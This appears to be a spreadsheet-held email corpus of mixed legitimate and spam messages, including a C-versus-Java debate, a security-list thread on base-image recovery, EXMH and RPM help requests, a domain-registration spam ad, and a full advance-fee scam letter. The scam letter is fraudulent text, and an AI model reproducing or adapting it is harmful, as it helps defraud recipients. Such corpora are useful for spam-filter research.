 then it's trivial anyway irrespective of language.
 &gt;I am amazed by the amount of time wasted by people talking about low
 &gt;level problems that have been solved 10 million times over and over
 &gt;and over again...
 You appear to be gratuitously asserting that C programmers waste time
 on irrelevant low-level problems and Java programmers don't.  Depends
 entirely on the programmer, not the language.
 &gt;3.  Java is not just a programming language! It's also a platform...
 Buzzword.
 &gt;a monolithic set of API's or a crap load of different API's slicing
 &gt;and dicing the same problems 50 different ways?
 Unsupported assertion.
 &gt;4.  If you have a program of any type of high complexity written in C, you
 &gt;can't possibly think that you could port it to different platforms within
 &gt;the same magnitude of cost as Java....
 Dunno.  E.g., I ported a wee 15000-line C program to Darwin on PowerPC
 in a few minutes yesterday.  Sure if it was badly designed it would be
 10 times the size and harder to port.  If it depended on unavailable
 libraries it would be much harder.  Portable code is easy to port.
 At least that is the case when then language you used is available on
 the target platform: I also run on ARM systems with no proper Java.
 &gt;5.  Makes no sense for a scientific or a business project to depend on a
 &gt;person... Java, IMHO, reduces the dependence of these entities on the
 &gt;individual developer as it is much easier to reverse engineer Java as it is
 &gt;to reverse engineer C (large applications).
 You can pay a good programmer to solve your problem now, or else get
 some kids to hack spaghetti Fortran in any language and then pay for
 maintenance headaches ad infinitum.
 &gt;6.  Hardware is getting so fast that I'm not sure if the performance
 &gt;difference between Java and C/C++ are relevant any more.
 Whoah!!!  Performance matters to me every day.  (Right now I'm taking
 time out to write email while waiting for a job to run).  Sure I could
 wait 5 years until everyone's PC is fast enough to generate random EC's
 in no time, when any twit will be able to program inefficient code
 that is fast enough and the market will be overrun by competitors,
 or I can do it now when very few people can.
 &gt;The end goal is the scientific or business problem to be solved.
 Yes.
 &gt;And for those problems, languages such as Java, SmallTalk, and others
 &gt;allow you to think more high level than low level.  Thinking of bits
 &gt;and bytes takes too much gray matter away from the real important
 &gt;problems....
 It's true!  I admit everything!  Mea maxima culpa!  Working in C makes
 me spend all day thinking base, rank thoughts about hard-core bitography!
 Not.
 Actually I spend most of my time thinking in high-level mathematics.
 &gt;Why do most computer scientists insist on solving the same problems
 &gt;over and over again [...]
 Dunno, and frankly I don't see the relevance to the issue at hand.
 I'm sure Java is fine for some stuff, as is C or whatever.  Horses for
 courses.
 Bye,
   Rob.
      .-.                                                               .-.
     /   \           .-.                                 .-.           /   \
    /     \         /   \       .-.     _     .-.       /   \         /     \
   /       \       /     \     /   \   / \   /   \     /     \       /       \
  /         \     /       \   /     `-'   `-'     \   /       \     /         \
             \   /         `-'                     `-'         \   /
              `-'                                               `-'
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: BIZ, .INFO, .COM for only $14.95
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00E2_83D00E6B.E2024A14
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 SU1QT1JUQU5UIElORk9STUFUSU9OOg0KDQpUaGUgbmV3IGRvbWFpbiBuYW1l
 cyBhcmUgZmluYWxseSBhdmFpbGFibGUgdG8gdGhlIGdlbmVyYWwgcHVibGlj
 IGF0IGRpc2NvdW50IHByaWNlcy4gTm93IHlvdSBjYW4gcmVnaXN0ZXIgb25l
 IG9mIHRoZSBleGNpdGluZyBuZXcgLkJJWiBvciAuSU5GTyBkb21haW4gbmFt
 ZXMsIGFzIHdlbGwgYXMgdGhlIG9yaWdpbmFsIC5DT00gYW5kIC5ORVQgbmFt
 ZXMgZm9yIGp1c3QgJDE0Ljk1LiBUaGVzZSBicmFuZCBuZXcgZG9tYWluIGV4
 dGVuc2lvbnMgd2VyZSByZWNlbnRseSBhcHByb3ZlZCBieSBJQ0FOTiBhbmQg
 aGF2ZSB0aGUgc2FtZSByaWdodHMgYXMgdGhlIG9yaWdpbmFsIC5DT00gYW5k
 IC5ORVQgZG9tYWluIG5hbWVzLiBUaGUgYmlnZ2VzdCBiZW5lZml0IGlzIG9m
 LWNvdXJzZSB0aGF0IHRoZSAuQklaIGFuZCAuSU5GTyBkb21haW4gbmFtZXMg
 YXJlIGN1cnJlbnRseSBtb3JlIGF2YWlsYWJsZS4gaS5lLiBpdCB3aWxsIGJl
 IG11Y2ggZWFzaWVyIHRvIHJlZ2lzdGVyIGFuIGF0dHJhY3RpdmUgYW5kIGVh
 c3ktdG8tcmVtZW1iZXIgZG9tYWluIG5hbWUgZm9yIHRoZSBzYW1lIHByaWNl
 LiAgVmlzaXQ6IGh0dHA6Ly93d3cuYWZmb3JkYWJsZS1kb21haW5zLmNvbSB0
 b2RheSBmb3IgbW9yZSBpbmZvLg0KIA0KUmVnaXN0ZXIgeW91ciBkb21haW4g
 bmFtZSB0b2RheSBmb3IganVzdCAkMTQuOTUgYXQ6IGh0dHA6Ly93d3cuYWZm
 b3JkYWJsZS1kb21haW5zLmNvbS8gIFJlZ2lzdHJhdGlvbiBmZWVzIGluY2x1
 ZGUgZnVsbCBhY2Nlc3MgdG8gYW4gZWFzeS10by11c2UgY29udHJvbCBwYW5l
 bCB0byBtYW5hZ2UgeW91ciBkb21haW4gbmFtZSBpbiB0aGUgZnV0dXJlLg0K
 IA0KU2luY2VyZWx5LA0KIA0KRG9tYWluIEFkbWluaXN0cmF0b3INCkFmZm9y
 ZGFibGUgRG9tYWlucw0KDQoNClRvIHJlbW92ZSB5b3VyIGVtYWlsIGFkZHJl
 c3MgZnJvbSBmdXJ0aGVyIHByb21vdGlvbmFsIG1haWxpbmdzIGZyb20gdGhp
 cyBjb21wYW55LCBjbGljayBoZXJlOg0KaHR0cDovL3d3dy5jZW50cmFscmVt
 b3ZhbHNlcnZpY2UuY29tL2NnaS1iaW4vZG9tYWluLXJlbW92ZS5jZ2kNCihl
 MSkNCjY0NjVVaVVOMS0wNDRXUUJCMTU0MGZoalo5LTgzNHlaeWIxOTc5emF2
 WjktNjk0bDQ0
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: confidence
</t>
  </si>
  <si>
    <t xml:space="preserve">This message is in MIME format. Since your mail reader does not understand
 this format, some or all of this message may not be legible.
 --=_NextPart_Caramail_0282101023460551_ID
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 ATTN:MANAGER
 HELLO DEAR,
 I am well confidence of your capability to assist me
 in
 a transaction for mutual benefit for both parties, ie
 (me and you) I am also believing that you will not
 expose or betray the trust and confidence I am about
 to establish on you. I have decided to contact you
 with greatest delight and personal respect.
 Well, I am BELLO SANKOH, Son to MR FODAY SANKOH
 who was arrested by the ECOMAOG PEACE KEEPING FORCE
 months ago in my country Sierra Leone.
 Few days before the arrest of my father, he confided
 in me and ordered me to go to his underground safe and
 move out immediately, with a Deposit Agreement and
 Cash Receipt he made with a security Company in
 Abidjan Cote d'Ivoire where he deposited One Iron Box
 containing USD$ 22 million dollars cash (Twenty Two
 Million dollars cash). This money was made from the
 sell of
 Gold and Diamond by my FATHER and he have already
 decided to use this money for future investment of
 the family before his arrest.
 Thereafter, I rushed down to Abidjan with these
 documents and confirmed the deposit of the box by my
 father. Also, I have been granted political stay as a
 Refugee by the Government of C=F4te d'Ivoire.
 Meanwhile, my father have instructed me to look for a
 trusted foreigner who can assist me to move out this
 money from C=F4te d'Ivoire immediately for investment .
 Based on this , I solicit for your assistance to
 transfer this fund into your Account, but I will
 demand for the following requirement:
 (1) Could you provide for me a safe Bank Account where
 this fund will be transferred to in your country or
 another nearby country where taxation will not
 take great toll on the money?
 (2) Could you be able to assist me to obtain my
 travelling papers after this transfer to enable me
 come over to meet you in your country for
 the investment of this money?
 (3) Could you be able to introduce me to a profitable
 business venture that would not require much technical
 expertise in your country where part of this fund
 will be invested?
 Please, all these requirements are urgently needed as
 it will enable me to establish a stronger business
 relationship with you hence I will like you to be the
 general overseer of the investment thereafter. I am a
 Christian and I will please, want you to handle this
 transaction based on the trust I have established
 on you.
 For your assistance in this transaction, I have
 decided to offer you 12% percent commission of the
 total amount ( 22 million dollars ) at the end of this
 business. The security of this business is very
 important to me and as such,
 I would like you to keep this business very
 confidential.
 I shall expect your urgent reply.
 My telephone number is 22507625348.
 Thank you and God bless you
 BELLO SANKOH Tel :22507625348
 _________________________________________________________ 
 Envoyez des messages musicaux sur le portable de vos amis 
  http://mobile.lycos.fr/mobile/local/sms_musicaux/
 --=_NextPart_Caramail_0282101023460551_ID--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: FW: use of base image / delta image for automated recovery
</t>
  </si>
  <si>
    <t xml:space="preserve">There is a software package that is used (or was up through w2k) 
 on MicroSloth for this purpose. Ghost, or some such. One essentially 
 "takes a picture" of the machine's proper config, and then upon 
 schedule or demand replaces the machine's current config with the 
 proper picture. It essentially over-writes the entire disk drive. 
 Especially good for student access machines at libraries, etc.
 Ben Mord wrote:
 &gt; 
 &gt;   -----Original Message-----
 &gt;   From: Crispin Cowan [mailto:crispin@wirex.com]
 &gt;   Sent: Wednesday, September 04, 2002 5:46 PM
 &gt;   To: Ben Mord
 &gt;   Cc: Webappsec Securityfocus.Com; SECPROG Securityfocus
 &gt;   Subject: Re: use of base image / delta image for automated recovery from
 &gt;  attacks
 &gt; 
 &gt; &gt;  I did my dissertation work in this area (Optimistic Computing) and so was
 &gt; &gt;interested in applying it to the security problem. Unfortunately, you hit a
 &gt; &gt;bunch of problems:
 &gt; 
 &gt; &gt;    a.. When can you "commit" a state as being "good"?  You can't run from
 &gt; a
 &gt; &gt;redo log forever; the performance and storage penalties accumulate. Even
 &gt; log
 &gt; &gt;structured file systems garbage collect eventually. So you have to commit
 &gt; &gt;sometime. The problem is that if you commit too eagerly, you might commit
 &gt; &gt;corrupted state. If you commit too conservatively, you eat performance and
 &gt; &gt;storage penalties.
 &gt; &gt;    b.. What do you do if you discover that there is corrupted state in the
 &gt; &gt;*middle* of your redo log, and you want some of the critical state that
 &gt; &gt;comes after it? You need some way to dig the corruption out of the middle
 &gt; &gt;and save the rest. My dissertation solves this problem, but you have to
 &gt; &gt;re-write everything in my programming language :)
 &gt; .    c.. Just doing this at all imposes substantial performance penalties. I
 &gt; &gt;love VMWare, and use it every day (the best $200 I ever spent on software)
 &gt; &gt;.but it is not very fast.
 &gt; 
 &gt; My proposed solution to the first two problems you mention is to be less
 &gt; ambitious. The idea is that you *never* commit - instead, you simply revert
 &gt; to base state on reboot. Obviously, you can't do this with partitions that
 &gt; accrue important state, e.g. a partition that stores database table data.
 &gt; But in your typical web application, most partitions do not accrue important
 &gt; state. For example, your typical web server or application server could have
 &gt; their entire state reset back to a known base state during each reboot
 &gt; without harm.
 &gt; The advantage of being less ambitious is that we have a quick and easy way
 &gt; to frustrate certain attacks without rewriting all of our software or
 &gt; spending lots of money on additional application-specific coding.
 &gt; 
 &gt; The first two problems you describe only occur if we become more ambitious
 &gt; and try to apply these same techniques to, for example, the database table
 &gt; partitions, where state changes remain important across reboots. That would
 &gt; certainly be a nice touch! But as you point out, many problems would have to
 &gt; be addressed first, and the hardest of these can not be abstracted away from
 &gt; the particular application. Not the least of these is the problem of writing
 &gt; heuristics for delineating good from malevolent state. That task is roughly
 &gt; analogous to what antiviral software authors do for a living, only this work
 &gt; could not be shared across many different systems as it would be specific to
 &gt; a paritcular application.
 &gt; 
 &gt; The third problem you mention - performance penalty - is an argument for
 &gt; doing this in hardware, much like hardware raid. Another argument for doing
 &gt; this in hardware is hack resistance. Changing the base instance should
 &gt; require physical access to the console, e.g. by requiring that you first
 &gt; flip a physical switch on your RAID hardware or modify a bios setting. If
 &gt; the base image can be modified remotely or by software, then you have to
 &gt; worry about whether an implementation flaw might permit a cracker to modify
 &gt; the base image remotely.
 &gt; 
 &gt; Ben
 -- 
     (                                                ______
     ))   .-- Scott MacKenzie; Dine' College ISD --.   &gt;===&lt;--.
   C|~~| (&gt;---  Phone/Voice Mail:  928-724-6639 ---&lt;) | ; o |-'
    |  |  \---  Senior DBA/CARS Coordinator/Etc. --/  |  _  |
    `--'   `- Email: scottm@crystal.ncc.cc.nm.us -'   `-----'
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: (PGP problem) EXMH hangs during 'Query keyserver'
</t>
  </si>
  <si>
    <t xml:space="preserve">I guess the first question here should be does anyone have some
 updates to the PGP code in EXMH that I should know about?
 My current problem is that if I get a PGP signed message, I first
 get a button that reads:
 	"Check the signature with GnuPG"
 If I punch the button, and I dont have the signature on my keyring
 then I get a message saying just that, and the message:
 	"Can't check signature: public key not found"
 along with a button with the inscription
 	"Query keyserver"
 If I punch the button then EXMH just hangs.  Forever.
 If instead of punching the button, I go out to the keyserver myself
 and then try the message again, everything works, so it SEEMS that it
 must be the code that goes out to the keyserver.
 Anyone else with this problem?
 This is EXMH v2.5 and tcl/tk 8.4a4
 -- 
                                         Reg.Clemens
                                         reg@dwf.com
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Installing RPM
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0002_01C23817.94245ED0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 I would like to install RPM itself. I have tried to get the information by
 visiting www.rpm.org &lt;http://www.rpm.org&gt;  and the related links they give
 but they all seems to assume that RPM already is installed.
 I have a firewall based on linux-2.2.20 (Smoothwall) for private use.
 I would like to install the RPM package/program but there is no information
 how to do this from scratch.
 Found this site and hopefully some have the knowledge.
 Best regards Manfred Grobosch
 ------=_NextPart_000_0002_01C23817.94245ED0
 Content-Type: application/ms-tnef;
 	name="winmail.dat"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 	filename="winmail.dat"
 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
